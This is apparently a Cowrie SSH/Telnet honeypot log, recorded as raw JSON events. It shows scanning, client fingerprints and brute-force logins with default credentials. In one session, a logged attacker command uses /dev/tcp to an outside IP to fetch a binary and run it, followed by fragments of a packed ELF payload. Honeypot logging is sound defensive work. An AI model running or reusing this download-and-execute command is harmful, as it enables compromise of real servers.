{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:49:05.518771Z","src_ip":"217.72.205.35","session":"897181ee8ddb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:50:22.786547Z","src_ip":"212.227.125.160","session":"ecdc3a966e96"}
{"eventid":"cowrie.session.closed","duration":180.1087086200714,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:50:22.790584Z","src_ip":"212.227.125.160","session":"ecdc3a966e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34448,"dst_ip":"1.2.3.4","dst_port":23,"session":"06582fd08802","protocol":"telnet","message":"New connection: 212.227.235.229:34448 (1.2.3.4:23) [session: 06582fd08802]","sensor":"my-vps","timestamp":"2025-09-08T15:51:00.110803Z"}
{"eventid":"cowrie.session.closed","duration":31.344091653823853,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:51:31.454800Z","src_ip":"212.227.235.229","session":"06582fd08802"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":58284,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f48d54b048c","protocol":"ssh","message":"New connection: 8.138.136.155:58284 (1.2.3.4:22) [session: 0f48d54b048c]","sensor":"my-vps","timestamp":"2025-09-08T15:52:15.461529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T15:52:15.462792Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T15:52:15.463469Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35400,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c2a526adea4","protocol":"telnet","message":"New connection: 212.227.125.160:35400 (1.2.3.4:23) [session: 7c2a526adea4]","sensor":"my-vps","timestamp":"2025-09-08T15:52:15.467003Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T15:52:16.096403Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:52:17.309050Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:52:17.812331Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T15:52:17.814011Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/tsWvNvQrpG && chmod +x /tmp/tsWvNvQrpG && /tmp/tsWvNvQrpG YqmgcNirgV6GHubvAJxYhr/XcqC5FAOxv3DQsp5YhwD57wKIXIC01XqxuBUbp6Bz2KuBXYEe4+8KhFqBsdNiqacSELG/c9KznluHBe3hAINbgatCglBPlYwe6aJ7rJJbdDwQrhITy4hPWQ==\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/tsWvNvQrpG && chmod +x /tmp/tsWvNvQrpG && /tmp/tsWvNvQrpG YqmgcNirgV6GHubvAJxYhr/XcqC5FAOxv3DQsp5YhwD57wKIXIC01XqxuBUbp6Bz2KuBXYEe4+8KhFqBsdNiqacSELG/c9KznluHBe3hAINbgatCglBPlYwe6aJ7rJJbdDwQrhITy4hPWQ==\" &","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.040118Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/Ukb9Jj1xcQ","message":"CMD: head -c 1458464 > /tmp/Ukb9Jj1xcQ","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.044322Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.259192Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.264320Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.268350Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d45a2127bd4e792632de8260712740e4fca651b6d070dc54fd963dc89b56f2b0","size":1968,"shasum":"d45a2127bd4e792632de8260712740e4fca651b6d070dc54fd963dc89b56f2b0","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/d45a2127bd4e792632de8260712740e4fca651b6d070dc54fd963dc89b56f2b0 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.269952Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:52:24.271411Z","src_ip":"8.138.136.155","session":"0f48d54b048c"}
{"eventid":"cowrie.session.closed","duration":31.233288288116455,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:52:46.700207Z","src_ip":"212.227.125.160","session":"7c2a526adea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59451,"dst_ip":"1.2.3.4","dst_port":23,"session":"20853c532b20","protocol":"telnet","message":"New connection: 212.227.235.229:59451 (1.2.3.4:23) [session: 20853c532b20]","sensor":"my-vps","timestamp":"2025-09-08T15:53:24.735189Z"}
{"eventid":"cowrie.session.closed","duration":31.164138555526733,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:53:55.899256Z","src_ip":"212.227.235.229","session":"20853c532b20"}
{"eventid":"cowrie.session.connect","src_ip":"198.235.24.145","src_port":51507,"dst_ip":"1.2.3.4","dst_port":23,"session":"bcae0e0f75d1","protocol":"telnet","message":"New connection: 198.235.24.145:51507 (1.2.3.4:23) [session: bcae0e0f75d1]","sensor":"my-vps","timestamp":"2025-09-08T15:54:01.818825Z"}
{"eventid":"cowrie.session.closed","duration":30.983881950378418,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:54:32.802632Z","src_ip":"198.235.24.145","session":"bcae0e0f75d1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51728,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cbc8dcfde27","protocol":"ssh","message":"New connection: 217.72.205.35:51728 (1.2.3.4:22) [session: 0cbc8dcfde27]","sensor":"my-vps","timestamp":"2025-09-08T15:55:37.584317Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:55:37.585904Z","src_ip":"217.72.205.35","session":"0cbc8dcfde27"}
{"eventid":"cowrie.session.connect","src_ip":"14.229.241.173","src_port":60898,"dst_ip":"1.2.3.4","dst_port":23,"session":"c17804672dfd","protocol":"telnet","message":"New connection: 14.229.241.173:60898 (1.2.3.4:23) [session: c17804672dfd]","sensor":"my-vps","timestamp":"2025-09-08T15:57:13.175511Z"}
{"eventid":"cowrie.session.closed","duration":30.857542037963867,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:57:44.032987Z","src_ip":"14.229.241.173","session":"c17804672dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47210,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2ced20a40ec","protocol":"ssh","message":"New connection: 212.227.125.160:47210 (1.2.3.4:22) [session: e2ced20a40ec]","sensor":"my-vps","timestamp":"2025-09-08T15:59:28.720289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:59:28.721359Z","src_ip":"212.227.125.160","session":"e2ced20a40ec"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T15:59:28.976614Z","src_ip":"212.227.125.160","session":"e2ced20a40ec"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:59:38.721398Z","src_ip":"212.227.125.160","session":"e2ced20a40ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57242,"dst_ip":"1.2.3.4","dst_port":23,"session":"e92de20d0e75","protocol":"telnet","message":"New connection: 212.227.235.229:57242 (1.2.3.4:23) [session: e92de20d0e75]","sensor":"my-vps","timestamp":"2025-09-08T16:00:48.504623Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:00:48.709814Z","src_ip":"212.227.235.229","session":"e92de20d0e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:00:48.770787Z","src_ip":"212.227.235.229","session":"e92de20d0e75"}
{"eventid":"cowrie.session.connect","src_ip":"111.253.173.216","src_port":35254,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d03a71f119d","protocol":"telnet","message":"New connection: 111.253.173.216:35254 (1.2.3.4:23) [session: 2d03a71f119d]","sensor":"my-vps","timestamp":"2025-09-08T16:00:53.796618Z"}
{"eventid":"cowrie.session.closed","duration":12.85328221321106,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:01:06.649835Z","src_ip":"111.253.173.216","session":"2d03a71f119d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50578,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a6011c9928b","protocol":"ssh","message":"New connection: 217.72.205.35:50578 (1.2.3.4:22) [session: 6a6011c9928b]","sensor":"my-vps","timestamp":"2025-09-08T16:02:28.877111Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:02:28.878269Z","src_ip":"217.72.205.35","session":"6a6011c9928b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41266,"dst_ip":"1.2.3.4","dst_port":23,"session":"6fcdf124a820","protocol":"telnet","message":"New connection: 212.227.235.229:41266 (1.2.3.4:23) [session: 6fcdf124a820]","sensor":"my-vps","timestamp":"2025-09-08T16:03:26.915648Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:03:48.793109Z","src_ip":"212.227.235.229","session":"e92de20d0e75"}
{"eventid":"cowrie.session.closed","duration":180.29267120361328,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:03:48.797232Z","src_ip":"212.227.235.229","session":"e92de20d0e75"}
{"eventid":"cowrie.session.closed","duration":31.358723878860474,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:03:58.274288Z","src_ip":"212.227.235.229","session":"6fcdf124a820"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.105","src_port":57464,"dst_ip":"1.2.3.4","dst_port":22,"session":"02bdb150adf6","protocol":"ssh","message":"New connection: 205.210.31.105:57464 (1.2.3.4:22) [session: 02bdb150adf6]","sensor":"my-vps","timestamp":"2025-09-08T16:04:52.119397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T16:04:52.830495Z","src_ip":"205.210.31.105","session":"02bdb150adf6"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T16:04:53.689954Z","src_ip":"205.210.31.105","session":"02bdb150adf6"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.173445Z","src_ip":"205.210.31.105","session":"02bdb150adf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57970,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae33aad274fd","protocol":"ssh","message":"New connection: 212.227.235.229:57970 (1.2.3.4:22) [session: ae33aad274fd]","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.430209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.431871Z","src_ip":"212.227.235.229","session":"ae33aad274fd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.537559Z","src_ip":"212.227.235.229","session":"ae33aad274fd"}
{"eventid":"cowrie.session.connect","src_ip":"193.46.255.159","src_port":33464,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fc49f2a6371","protocol":"ssh","message":"New connection: 193.46.255.159:33464 (1.2.3.4:22) [session: 4fc49f2a6371]","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.639249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.640067Z","src_ip":"193.46.255.159","session":"4fc49f2a6371"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.669955Z","src_ip":"193.46.255.159","session":"4fc49f2a6371"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:05:00.874059Z","src_ip":"193.46.255.159","session":"4fc49f2a6371"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:05:01.041666Z","src_ip":"212.227.235.229","session":"ae33aad274fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9314,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b5474f3220e","protocol":"ssh","message":"New connection: 212.227.125.160:9314 (1.2.3.4:22) [session: 7b5474f3220e]","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.147829Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.148900Z","src_ip":"212.227.125.160","session":"7b5474f3220e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9559,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a29376c2e5c","protocol":"ssh","message":"New connection: 212.227.125.160:9559 (1.2.3.4:22) [session: 2a29376c2e5c]","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.259040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.259874Z","src_ip":"212.227.125.160","session":"2a29376c2e5c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.374380Z","src_ip":"212.227.125.160","session":"2a29376c2e5c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.715525Z","src_ip":"212.227.125.160","session":"2a29376c2e5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T16:06:06.829814Z","session":"2a29376c2e5c"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":36970,"dst_ip":"1.2.3.4","dst_port":22,"session":"294121491766","protocol":"ssh","message":"New connection: 8.138.136.155:36970 (1.2.3.4:22) [session: 294121491766]","sensor":"my-vps","timestamp":"2025-09-08T16:07:12.000236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T16:07:12.000969Z","src_ip":"8.138.136.155","session":"294121491766"}
